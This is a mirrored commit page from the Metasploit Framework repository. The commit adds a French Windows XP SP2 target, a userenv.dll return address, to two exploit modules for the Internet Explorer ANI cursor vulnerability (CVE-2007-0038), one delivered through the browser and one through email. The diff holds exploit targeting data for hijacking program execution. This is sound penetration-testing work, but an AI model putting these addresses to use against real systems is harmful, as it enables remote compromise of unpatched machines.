mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-12 11:52:01 +01:00
Adds a target for French SP2
git-svn-id: file:///home/svn/framework3/trunk@4658 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
e13a690bc6
commit
f60785b2f5
@ -87,6 +87,9 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||
|
||||
# Should work for all English XP SP2
|
||||
[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],
|
||||
|
||||
# Supplied by Fabrice MOURRON <fab[at]revhosts.net>
|
||||
[ 'Windows XP SP2 userenv.dll French', { 'Ret' => 0x7699c81a }],
|
||||
|
||||
# Should work for English XP SP0/SP1
|
||||
[ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }],
|
||||
|
@ -86,7 +86,10 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||
|
||||
# Should work for all English XP SP2
|
||||
[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],
|
||||
|
||||
|
||||
# Supplied by Fabrice MOURRON <fab[at]revhosts.net>
|
||||
[ 'Windows XP SP2 userenv.dll French', { 'Ret' => 0x7699c81a }],
|
||||
|
||||
# Should work for English XP SP0/SP1
|
||||
[ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }],
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user